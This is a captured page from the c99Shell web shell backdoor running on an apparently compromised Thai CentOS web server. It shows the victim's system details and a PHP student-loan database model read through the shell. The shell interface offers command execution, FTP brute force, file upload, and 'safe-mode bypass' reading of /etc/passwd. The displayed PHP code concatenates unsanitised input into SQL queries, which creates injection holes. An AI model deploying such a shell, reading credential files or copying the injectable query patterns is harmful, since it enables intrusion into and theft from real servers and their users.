!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/esa/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     sa_borrow_model.php (4.46 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include_once("da_sa_borrow.php");

class 
Sa_borrow_model extends Da_sa_borrow {

    
/*
     * aOrderBy = array('fieldname' => 'ASC|DESC', ... )
     */
    
function get_all($aOrderBy=""){
        
$orderBy "";
        if ( 
is_array($aOrderBy) ) {
            
$orderBy.= "ORDER BY "
            foreach (
$aOrderBy as $key => $value) {
                
$orderBy.= "$key $value, ";
            }
            
$orderBy substr($orderBy0strlen($orderBy)-2);
        }
        
$sql "SELECT * 
                FROM sa_borrow 
                $orderBy"
;
        
$query $this->db->query($sql);
        return 
$query;
    }
    
    
/*
     * create array of pk field and value for generate select list in view, must edit PK_FIELD and FIELD_NAME manually
     * the first line of select list is '-----เลือก-----' by default.
     * if you do not need the first list of select list is '-----เลือก-----', please pass $optional parameter to other values. 
     * you can delete this function if it not necessary.
     */
    
function get_options($optional='y') {
        
$qry $this->get_all();
        if (
$optional=='y'$opt[''] = '-----เลือก-----';
        foreach (
$qry->result() as $row) {
            
$opt[$row->PK_FIELD] = $row->FIELD_NAME;
        }
        return 
$opt;
    }
    
    
// add your functions here

    
function get_by_key_2($withSetAttributeValue=FALSE) {
        
$sql "SELECT * 
                FROM $this->sa_dbname.sa_borrow 
                INNER JOIN $this->rg_dbname.rg_Student ON brw_std_id = stdId 
                WHERE brw_id = ?"
;
        
$query $this->db->query($sql, array($this->brw_id));
        if ( 
$withSetAttributeValue ) {
            
$this->row2attribute$query->row() );
        } else {
            return 
$query ;
        }
    }

    function 
get_by_cond($receive_date$stdCode=''$no=''$scholarship=''$source=''$type=''$amt=''$status=''$note='',$req_no='') {
        
$cond '';
        if (
$stdCode) {
            
$cond .= " OR stdCode LIKE '%$stdCode%'";
        }
        if (
$no) {
            
$cond .= " OR brw_no LIKE '%$no%'";
        }
        if (
$req_no) {
            
$cond .= " OR brw_req_no LIKE '%$req_no%'";
        }
        if (
$scholarship) {
            
$cond .= " OR brw_scholarship LIKE '%$scholarship%'";
        }
        if (
$source) {
            
$cond .= " OR brw_source LIKE '%$source%'";
        }
        if (
$type) {
            
$cond .= " OR brw_type LIKE '%$type%'";
        }
        if (
$amt) {
            
$cond .= " OR brw_amt = '$amt'";
        }
        if (
$status) {
            
$cond .= " OR brw_status LIKE '%$status%'";
        }
        if (
$note) {
            
$cond .= " OR brw_note LIKE '%$note%'";
        }
        
$sql "SELECT * 
                FROM $this->sa_dbname.sa_borrow 
                INNER JOIN $this->rg_dbname.rg_Student ON brw_std_id = stdId 
                INNER JOIN $this->ppc_dbname.Prefix ON stdPfId = prefixId 
                WHERE brw_receive_date = ? "
.$cond;
        
$query $this->db->query($sql, array($receive_date));
        return 
$query;
    }

    function 
get_by_std($std) {
        
$sql "SELECT * 
                FROM $this->sa_dbname.sa_borrow 
                INNER JOIN $this->rg_dbname.rg_Student ON brw_std_id = stdId 
                INNER JOIN $this->ppc_dbname.Prefix ON stdPfId = prefixId 
                WHERE stdCode LIKE ? OR stdName LIKE ? OR stdSurname LIKE ?"
;
        
$query $this->db->query($sql, array('%'.$std.'%','%'.$std.'%','%'.$std.'%'));
        return 
$query;
    }
    
    function 
get_by_acYtmIdstd($acY,$tmId,$std) {
        
$sql "SELECT * 
                FROM $this->sa_dbname.sa_borrow 
                INNER JOIN $this->rg_dbname.rg_Student ON brw_std_id = stdId 
                INNER JOIN $this->ppc_dbname.Prefix ON stdPfId = prefixId 
                WHERE stdCode LIKE ? OR stdName LIKE ? OR stdSurname LIKE ? AND brw_acY = ? AND brw_tmId = ?"
;
        
$query $this->db->query($sql, array('%'.$std.'%','%'.$std.'%','%'.$std.'%',$acY,$tmId));
        return 
$query;
    }
    
    function 
get_by_sumacYtmIdstd($acY,$tmId,$std) {
        
$sql "SELECT * ,sum(brw_amt) as sumAmt
                FROM $this->sa_dbname.sa_borrow 
                INNER JOIN $this->rg_dbname.rg_Student ON brw_std_id = stdId 
                INNER JOIN $this->ppc_dbname.Prefix ON stdPfId = prefixId 
                WHERE stdCode LIKE ? OR stdName LIKE ? OR stdSurname LIKE ? AND brw_acY = ? AND brw_tmId = ?"
;
        
$query $this->db->query($sql, array('%'.$std.'%','%'.$std.'%','%'.$std.'%',$acY,$tmId));
        return 
$query;
    }
    
    function 
getByReq_no($id){
        
$sql "SELECT * 
                FROM $this->sa_dbname.sa_borrow where brw_req_no like '$id'"
;
        
$query $this->db->query($sql);
        return 
$query;
    }
    
    function 
getAuto($source='',$mode){
        
$cond '';
        if (
$source) {
            if(
$mode==1){
                
$cond .= " and brw_scholarship LIKE '%$source%' group by brw_scholarship";
            }else if(
$mode==2){
                
$cond .= " and brw_source LIKE '%$source%' group by brw_source";
            }else if(
$mode==3){
                
$cond .= " and brw_type LIKE '%$source%' group by brw_type";
            }
        }
        
$sql "SELECT * 
                FROM $this->sa_dbname.sa_borrow where 1=1 "
.$cond;
        
$query $this->db->query($sql);
        return 
$query;
    }
// end class M_sa_borrow
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0089 ]--